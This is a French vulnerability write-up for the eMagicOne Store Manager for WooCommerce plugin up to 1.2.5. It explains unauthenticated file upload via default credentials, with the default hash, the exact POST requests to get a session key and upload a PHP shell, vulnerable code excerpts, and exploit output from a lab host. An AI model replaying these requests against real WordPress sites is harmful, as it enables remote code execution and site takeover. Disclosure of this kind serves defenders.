
eMagicOne Store Manager pour WooCommerce <= 1.2.5 - Téléchargement arbitraire de fichier non authentifié via la tâche set_file
Le plugin eMagicOne Store Manager pour WooCommerce expose un point de terminaison de protocole de gestion à distance (?connector=bridge) qui permet de télécharger des fichiers sur le serveur. Le mécanisme d'authentification repose sur un couple d'identifiants par défaut (login=1, password=1) et un système de clé de session. Si les identifiants par défaut ne sont pas modifiés, un attaquant peut s'authentifier trivialement, obtenir une clé de session et télécharger des fichiers arbitraires (y compris des shells PHP) dans la racine WordPress ou tout répertoire accessible en écriture.
shell.php via le mécanisme d'authentification par défaut, et exécuter du code à distance :python3 exploit.py https://lab1.hacker
[*] Requesting session key...
[*] Raw response: {"response_code":20,"revision":11,"module_version":"1.2.5","session_key":"6f46bc8b67b1c8f0dc871bcec9e162c1d43f047e5c46aec7d7fdf48d8c17ed69"}
[+] Got session key: 6f46bc8b67b1c8f0dc871bcec9e162c1d43f047e5c46aec7d7fdf48d8c17ed69
[*] Uploading file...
[*] Upload response: {"response_code":20,"message":"File was successfully uploaded"}
[*] Executing Web Shell Commands...
<pre>1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:5b:34:2f brd ff:ff:ff:ff:ff:ff
altname enp0s3
inet 10.0.2.15/24 metric 100 brd 10.0.2.255 scope global dynamic eth0
valid_lft 23576sec preferred_lft 23576sec
inet6 fd17:625c:f037:2:a00:27ff:fe5b:342f/64 scope global dynamic mngtmpaddr noprefixroute
valid_lft 86363sec preferred_lft 14363sec
inet6 fe80::a00:27ff:fe5b:342f/64 scope link
valid_lft forever preferred_lft forever
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP group default qlen 1000
link/ether 08:00:27:39:ea:eb brd ff:ff:ff:ff:ff:ff
altname enp0s8
inet 192.168.56.56/24 brd 192.168.56.255 scope global eth1
valid_lft forever preferred_lft forever
inet6 fe80::a00:27ff:fe39:eaeb/64 scope link
valid_lft forever preferred_lft forever
4: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default
link/ether 02:42:ef:a9:95:6a brd ff:ff:ff:ff:ff:ff
inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
valid_lft forever preferred_lft forever
</pre>
Lors de l'activation du plugin, les constantes suivantes sont définies dans smconnector.php :
define( 'EMO_SMC_DEFAULT_LOGIN', '1' );
define( 'EMO_SMC_DEFAULT_PASSWORD', '1' );
Le hachage par défaut utilisé pour l'authentification est :
'smconnector_hash' => md5( EMO_SMC_DEFAULT_LOGIN . EMO_SMC_DEFAULT_PASSWORD ),
Résultat : Le hachage par défaut est md5('1' . '1') = c4ca4238a0b923820dcc509a6f75849b.
Une clé de session est obtenue en envoyant une requête POST au point de terminaison bridge avec le hachage et une tâche (par exemple, get_version) :
POST /?connector=bridge
Content-Type: application/x-www-form-urlencoded
hash=c4ca4238a0b923820dcc509a6f75849b&task=get_version
Code concerné :
classes/class-emosmconnectorcommon.php (lignes ~441-525) :
private function check_auth() {
if ( $this->shop_cart->isset_request_param( 'key' ) ) {
// ... session key validation ...
} elseif ( $this->shop_cart->isset_request_param( 'hash' ) ) {
$hash = (string) $this->shop_cart->get_request_param( 'hash' );
if ( ! $this->is_hash_valid( $hash ) ) {
// ... error ...
}
$key = $this->generate_session_key( $hash );
// ... return session key ...
}
}
La clé de session est stockée dans la table wp_smconnector_session_keys :
private function generate_session_key( $hash ) {
$key = hash( 'sha256', $hash . $timestamp );
$sql = 'INSERT INTO `' . self::TABLE_SESSION_KEYS
. "` (`session_key`, `date_added`, `last_activity`) VALUES ('" . $this->shop_cart->p_sql( $key ) . "', '"
. $date . "', '" . $date . "')";
$this->shop_cart->exec_sql( $sql );
return $key;
}
Avec une clé de session valide, un attaquant peut télécharger un fichier en utilisant la tâche set_file :
POST /?connector=bridge&task=set_file&key=<session_key>&entity_type=.&filename=hello.txt
Content-Type: multipart/form-data
[email protected];type=text/plain
Code concerné :
classes/class-emosmconnectorcommon.php (lignes ~2250+) :
private function set_file() {
// ... parameter checks ...
if ( ! $this->shop_cart->set_file( $entity_type, $filename, self::UPLOAD_FILE_NAME ) ) {
$this->generate_error( $this->br_errors['upload_file_error'] );
}
}
classes/class-emosmcwoocommerceoverrider.php (lignes ~440+) :
public function set_file( $folder, $filename, $file ) {
$destination_path = $this->get_shop_root_dir() . "$folder/$filename";
if ( isset( $_FILES[ $file ]['tmp_name'] ) ) {
$tmp_name = sanitize_text_field( $_FILES[ $file ]['tmp_name'] );
$result = move_uploaded_file( $tmp_name, $destination_path );
}
if ( $result ) {
die(json_encode(array(self::CODE_RESPONSE => self::SUCCESSFUL, self::KEY_MESSAGE => 'File was successfully uploaded')));
}
}
Résultat : Le fichier est écrit dans la racine WordPress (ou tout répertoire spécifié).